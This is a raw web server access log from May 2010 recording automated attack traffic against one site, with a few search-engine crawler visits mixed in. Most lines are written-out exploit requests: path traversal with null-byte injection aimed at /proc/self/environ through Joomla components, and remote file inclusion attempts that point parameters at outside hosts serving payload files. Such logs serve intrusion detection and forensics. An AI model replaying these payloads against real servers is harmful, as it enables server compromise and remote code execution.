70.38.71.147 - - [19/May/2010:08:18:01 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:08:18:01 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:08:21:08 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:08:21:08 -0500] "GET /index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:08:21:08 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
80.65.166.74 - - [19/May/2010:08:21:35 -0500] "GET /logs/access_log.1262649600//?option=com_joomlalib/index.php?option=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:08:21:35 -0500] "GET /logs//?option=com_joomlalib/index.php?option=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 200 6151 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:08:21:35 -0500] "GET //?option=com_joomlalib/index.php?option=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
80.65.166.74 - - [19/May/2010:08:23:36 -0500] "GET /logs/access_log.1264118400//?option=com_joomlalib/index.php?option=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
111.67.9.133 - - [19/May/2010:08:23:37 -0500] "GET /logs/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
207.46.13.87 - - [19/May/2010:08:25:06 -0500] "GET /logs/access_log.1199664000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
38.101.148.126 - - [19/May/2010:08:25:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [19/May/2010:08:25:13 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
140.121.81.96 - - [19/May/2010:08:25:48 -0500] "GET //index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
140.121.81.96 - - [19/May/2010:08:25:48 -0500] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-"""
81.177.13.130 - - [19/May/2010:08:25:57 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:25:57 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:25:57 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:25:58 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:25:58 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:25:58 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:25:58 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:25:58 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:25:58 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:25:58 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:25:58 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:25:58 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:25:58 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:25:58 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:25:59 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:27:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:27:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:27:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:27:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:27:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:27:37 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:27:45 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:27:59 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:28:01 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:08:28:06 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.125.182.40 - - [19/May/2010:08:29:29 -0500] "GET //header.php?base_folder=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:08:29:29 -0500] "GET /logs//header.php?base_folder=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.813"
88.191.94.188 - - [19/May/2010:08:29:32 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:29:32 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:29:32 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:29:32 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:29:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:29:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:29:32 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:29:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:29:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:29:32 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:29:32 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:29:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:29:32 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:29:32 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:29:33 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:30:36 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
207.46.199.47 - - [19/May/2010:08:30:36 -0500] "GET /logs/access_log.1245628800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.94.188 - - [19/May/2010:08:30:47 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:30:50 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:30:51 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:08:31:04 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
94.125.182.40 - - [19/May/2010:08:31:27 -0500] "GET //header.php?base_folder=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:08:31:27 -0500] "GET /logs//header.php?base_folder=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.813"
111.67.9.133 - - [19/May/2010:08:34:24 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
209.62.121.162 - - [19/May/2010:08:34:40 -0500] "GET /logs/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.62.121.162 - - [19/May/2010:08:34:40 -0500] "GET /logs/access_log.1272585600/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.62.121.162 - - [19/May/2010:08:34:40 -0500] "GET /logs/access_log.1262649600/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.62.121.162 - - [19/May/2010:08:34:40 -0500] "GET /index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.62.121.162 - - [19/May/2010:08:34:43 -0500] "GET /index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.62.121.162 - - [19/May/2010:08:34:43 -0500] "GET /logs/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.62.121.162 - - [19/May/2010:08:34:43 -0500] "GET /logs/access_log.1262649600/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.62.121.162 - - [19/May/2010:08:34:43 -0500] "GET /logs/access_log.1272585600/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.62.121.162 - - [19/May/2010:08:35:13 -0500] "GET /logs/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.62.121.162 - - [19/May/2010:08:35:13 -0500] "GET /logs/access_log.1262649600/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.62.121.162 - - [19/May/2010:08:35:13 -0500] "GET /index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.62.121.162 - - [19/May/2010:08:35:16 -0500] "GET /logs/access_log.1272585600/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.62.121.162 - - [19/May/2010:08:35:26 -0500] "GET /logs/access_log.1265760000/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.62.121.162 - - [19/May/2010:08:35:29 -0500] "GET /logs/access_log.1265760000/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
70.38.71.147 - - [19/May/2010:08:36:09 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:08:36:09 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:36:09 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:36:09 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:08:36:09 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
94.23.9.198 - - [19/May/2010:08:36:09 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
74.54.63.138 - - [19/May/2010:08:36:09 -0500] "GET /index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:36:09 -0500] "GET /index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:08:36:09 -0500] "GET /index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:08:36:09 -0500] "GET /index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:08:36:09 -0500] "GET /index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:08:36:09 -0500] "GET /logs/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:36:09 -0500] "GET /logs/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:36:09 -0500] "GET /logs/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:08:36:09 -0500] "GET /logs/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
94.23.9.198 - - [19/May/2010:08:36:09 -0500] "GET /index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
70.38.71.147 - - [19/May/2010:08:36:09 -0500] "GET /logs/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.195.112.180 - - [19/May/2010:08:36:09 -0500] "GET /logs/access_log.1182470400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.9.198 - - [19/May/2010:08:36:09 -0500] "GET /logs/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
209.62.121.162 - - [19/May/2010:08:36:11 -0500] "GET /logs/access_log.1265760000/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.54.63.138 - - [19/May/2010:08:36:48 -0500] "GET /index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:36:48 -0500] "GET /index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:08:36:48 -0500] "GET /index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:08:36:48 -0500] "GET /index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:08:36:48 -0500] "GET /index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:08:36:48 -0500] "GET /index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
209.62.121.162 - - [19/May/2010:08:36:57 -0500] "GET /logs/access_log.1272844800%20%20/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:08:36:58 -0500] "GET /logs/access_log.1223078400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.54.63.138 - - [19/May/2010:08:37:28 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:08:37:28 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
209.62.121.162 - - [19/May/2010:08:37:32 -0500] "GET /logs/access_log.1272844800%20%20/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
70.38.71.147 - - [19/May/2010:08:37:32 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
209.62.121.162 - - [19/May/2010:08:37:33 -0500] "GET /logs/access_log.1272844800%20%20/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.54.63.138 - - [19/May/2010:08:37:37 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:08:37:39 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
70.38.71.147 - - [19/May/2010:08:37:40 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=66task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
216.245.220.19 - - [19/May/2010:08:44:31 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:08:44:31 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:08:44:31 -0500] "GET /logs/access_log.1271548800//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
91.198.32.224 - - [19/May/2010:08:48:07 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
207.46.13.145 - - [19/May/2010:08:49:06 -0500] "GET /logs/access_log.1167782400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.62.121.162 - - [19/May/2010:08:49:13 -0500] "GET /logs/access_log.1272844800/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:08:49:25 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:08:49:25 -0500] "GET /logs/access_log.1265414400/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:08:49:25 -0500] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:08:49:27 -0500] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:08:49:27 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:08:49:27 -0500] "GET /logs/access_log.1265414400/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:08:49:42 -0500] "GET /logs/access_log.1263168000/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:08:49:48 -0500] "GET /logs/access_log.1263168000/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
94.125.182.40 - - [19/May/2010:08:49:53 -0500] "GET //Worksheet.php?mosConfig_absolute_path=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:08:49:53 -0500] "GET /logs//Worksheet.php?mosConfig_absolute_path=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 303 "-""libwww-perl/5.813"
209.62.121.162 - - [19/May/2010:08:49:57 -0500] "GET /logs/access_log.1272844800/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:08:50:10 -0500] "GET /logs/access_log.1265241600/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:08:50:10 -0500] "GET /logs/access_log.1263340800/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.133.201.194 - - [19/May/2010:08:50:20 -0500] "GET /logs/access_log.1265241600/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
209.62.121.162 - - [19/May/2010:08:50:42 -0500] "GET /logs/access_log.1272844800/index0.php?show=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.115.111.248 - - [19/May/2010:08:51:29 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
88.191.94.188 - - [19/May/2010:08:51:33 -0500] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:08:51:33 -0500] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
